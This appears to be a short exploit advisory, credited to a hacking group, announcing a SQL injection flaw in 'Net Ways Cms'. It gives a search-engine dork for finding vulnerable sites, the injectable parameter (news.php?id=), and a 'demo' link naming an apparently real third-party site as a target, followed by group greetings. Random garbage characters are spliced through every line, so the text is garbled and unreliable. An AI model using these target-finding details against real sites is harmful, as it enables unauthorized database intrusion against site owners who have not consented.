################################################################################??########
& }. ]2 V) ?% |. u9 j, c1 K# % N" `6 K e' G* z
# Exploit Title : Net Ways Cms Sql Injection Vulnerability ' P1 @& Q% N; r9 z" s+ Y7 L
#
+ t8 V' v% U3 t I- P# Author : IrIsT.Ir
5 u6 l0 T( M5 T# ) ] K4 S. k" B9 s* D* d
# Discovered By : Am!r
1 W5 `; ]% [! D* S#
/ J, _1 f0 q5 P' U4 r% s' p# Home : http://IrIsT.Ir/forum 7 X) {. F6 |1 M4 P+ j9 Y% C8 W% |
#
; O; O8 J' b6 h0 s# Software Link : http://www.netways.com/ www.political-security.com
3 V% n4 o4 _6 X6 v( \3 R; z( `! R# - Y7 V+ y. R/ h
# Security Risk : High , s2 I- _( k; d! A0 v# Y
# ) B% N5 d, O" V% j
# Version : All Version # L: ^6 U: Z. N! P4 H: F2 l
# - d6 ^( _8 s& `
# Tested on : GNU/Linux Ubuntu - Windows Server - win7
& V3 G5 q l* k7 n4 q2 D6 Q# ( I3 N- u' o0 K
# Dork : intext:"Designed & developed by NetWays" + M* \, J' g( P& z% L( s# s$ k' R
#
( ~( M; G7 V Z8 E: K' Z2 Z################################################################################??######## * h; V5 q8 b5 }
#
) f4 M5 a/ `# D0 \$ I" E# E- N* G# Expl0iTs :
2 Q0 B* X( B' n5 j* z6 C0 S+ Q# q' ]+ d# J& O+ T. t
# http://target.com/news.php?id=[Sql]
2 Z4 v" l8 w! Y f, \#
7 K. e- s; W+ x& m# 1 E' @5 s p2 ]2 d. } W; `5 g
# D3mo : : i; |0 ^$ a/ O) y2 y3 ^! H4 C6 Q; ^
# 1 d9 u8 j3 @) R4 E6 E8 J
# http://compagnieparento.com/news.php?id=7[Sql] 5 x4 T1 C8 ]2 N: W+ s1 R
# 3 | B! G& @" X+ I; I
################################################################################??########
' c& A; H, | w9 Q#
/ Y( X) z. _- t$ Z6 y2 E' P6 d# Greats : B3HZ4D - nimaarek - Dead.Zone - C0dex - SpooferNinja - TaK.FaNaR - Nafsh - BestC0d3r
+ l& d. P/ _' f) l' H! n' K# 2 L4 M% s/ y$ q" C z q3 H
# 0x0ptim0us - TaK.FaNaR - m3hdi - F@rid - Siamak.Black - H4x0r - dr.tofan - skote_vahshat - d3c0d3r $ j. k9 |* D1 o) D7 }! i, o" p8 Y
#
9 r- f# Q' t5 j0 I# Mr.Xpr & M.R.S.CO & Mr.Cicili & H-SK33PY & All Members In Www.IrIsT.Ir/forum
7 U: q, S3 j- a. M3 Y- `#
9 u- } ?/ I7 D2 I$ H8 U################################################################################??######## |